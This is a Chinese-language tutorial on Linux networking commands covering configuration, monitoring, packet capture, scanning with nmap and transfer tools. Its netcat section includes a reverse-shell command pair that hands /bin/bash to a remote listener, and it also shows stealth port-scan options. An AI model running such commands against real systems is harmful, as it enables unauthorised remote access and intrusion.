linux强大命令网络
linux强大命令网络详细介绍
在 Linux 系统中,网络命令是运维、安全和开发人员的核心工具,它们能够实现从基础连通性测试到高级流量分析的全流程操作。以下是结合最新工具和实践场景的深度解析:
一、网络配置与状态管理
1.
ip 命令:新一代网络配置标准
- 功能:替代传统的
ifconfig,支持 IPv4/IPv6、路由表、ARP 管理等。 - 示例:
- 显示接口信息:
ip addr show(等同于ifconfig)。 - 启用 / 禁用接口:
ip link set eth0 up/down。 - 添加 IP 地址:
ip addr add 192.168.1.100/24 dev eth0。
- 显示接口信息:
- 优势:通过
netlink套接字直接与内核通信,性能更优,支持复杂配置如 VLAN、网桥等。
2.
nmcli:图形化工具的 CLI 替代
- 功能:管理 NetworkManager 连接,支持 Wi-Fi、VPN、热点等。
- 示例:
- 扫描 Wi-Fi:
nmcli device wifi list。 - 连接热点:
nmcli device wifi connect "SSID" password "pass"。
- 扫描 Wi-Fi:
二、网络监控与诊断
1.
ss:高效的连接状态查看
- 功能:替代
netstat,实时显示 TCP/UDP 连接、Socket 统计。 - 示例:
- 显示所有监听端口:
ss -tuln。 - 过滤状态为 ESTABLISHED 的连接:
ss -state established。
- 显示所有监听端口:
- 优势:直接读取内核数据,速度更快,支持复杂过滤(如
ss '( dport = :http or sport = :http )')。
2.
iftop:实时流量监控
- 功能:类似
top,显示网卡实时流量、源 / 目标 IP 和端口。 - 示例:
- 监控 eth0 流量:
iftop -i eth0。 - 过滤特定 IP:按
l输入192.168.1.100回车。
- 监控 eth0 流量:
- 场景:快速定位流量异常主机,例如某 IP 突发高带宽占用。
3.
tcpdump:网络抓包神器
- 功能:捕获并分析网络数据包,支持协议过滤、保存文件。
- 示例:
- 抓 HTTP 流量:
tcpdump -i eth0 port 80 -A(ASCII 显示)。 - 保存到文件:
tcpdump -i any port 443 -w ssl.pcap。
- 抓 HTTP 流量:
- 进阶:结合
wireshark分析:tcpdump -i eth0 -w - | wireshark -k -i -。
三、网络扫描与安全审计
1.
nmap:端口扫描与渗透测试
- 功能:主机发现、端口扫描、服务识别、操作系统指纹识别。
- 示例:
- 快速扫描:
nmap -T4 -F 192.168.1.1(扫描前 100 个端口)。 - SYN 半开扫描:
nmap -sS -p 1-65535 192.168.1.1(隐蔽性强)。 - 操作系统检测:
nmap -O 192.168.1.1。
- 快速扫描:
- 技巧:
nmap -sC -sV启用默认脚本和版本检测,提升扫描效率。
2.
mtr:路由诊断增强版
- 功能:结合
ping和traceroute,实时显示路由节点丢包率。 - 示例:
mtr -rwc 100 8.8.8.8(持续 100 次探测,显示详细统计)。
四、网络工具集
1.
curl/wget:数据传输与协议测试
- 功能:支持 HTTP/HTTPS、FTP、SMTP 等协议,用于下载或 API 调试。
- 示例:
- 下载文件:
wget https://example.com/file.zip。 - 测试 API:
curl -X POST -H "Content-Type: application/json" -d '{"key":"value"}' https://api.example.com。
- 下载文件:
2.
netcat:网络瑞士军刀
- 功能:端口扫描、文件传输、反向 Shell、端口转发。
- 示例:
- 端口扫描:
nc -vz -w1 192.168.1.1 22-80。 - 文件传输:服务端
nc -l 8000 > file.txt,客户端nc 192.168.1.1 8000 < file.txt。 - 反向 Shell:攻击机
nc -lvp 4444,靶机nc 192.168.1.1 4444 -e /bin/bash。
- 端口扫描:
3.
dig/host:DNS 解析工具
- 功能:查询域名解析记录,诊断 DNS 问题。
- 示例:
- A 记录查询:
dig example.com A。 - MX 记录查询:
host -t mx example.com。
- A 记录查询:
五、高级工具与场景
1.
iperf3:网络性能测试
- 功能:测量带宽、延迟、抖动、丢包率。
- 示例:服务端
iperf3 -s,客户端iperf3 -c 192.168.1.1 -t 30(30 秒测试)。
2.
vnstat:长期流量统计
- 功能:按天、周、月统计网卡流量,生成报告。
- 示例:
vnstat -i eth0 -d(显示当日流量)。
3.
firewalld:防火墙配置
- 功能:动态管理防火墙规则,支持 zone 策略。
- 示例:开放 80 端口:
firewall-cmd --zone=public --add-port=80/tcp --permanent。
六、命令对比与最佳实践
| 功能 | 推荐命令 | 替代方案 | 场景建议 |
|---|---|---|---|
| 接口配置 | ip |
ifconfig(已过时) |
新配置优先使用 ip |
| 连接状态 | ss |
netstat |
高负载环境必用 ss |
| 抓包分析 | tcpdump |
tshark |
简单过滤用 tcpdump,复杂分析用 wireshark |
| 端口扫描 | nmap |
nc |
深度扫描用 nmap,快速探测用 nc |
| 流量监控 | iftop |
bmon |
实时监控用 iftop,长期统计用 vnstat |
七、注意事项
- 权限要求:部分命令(如
ip link set、tcpdump)需 root 权限。 - 网络安全:扫描工具(如
nmap)可能触发防火墙警报,需提前授权。 - 性能影响:高频率抓包或扫描可能影响网络性能,建议在非生产环境测试。
- 工具版本:部分工具(如
nmap)需更新到最新版以支持新协议(如 QUIC)。
通过组合使用这些命令,您可以完成从基础网络诊断到高级安全审计的全流程操作。建议结合 man 手册(如 man ip)和在线资源(如 Linux 命令行大全)深入学习。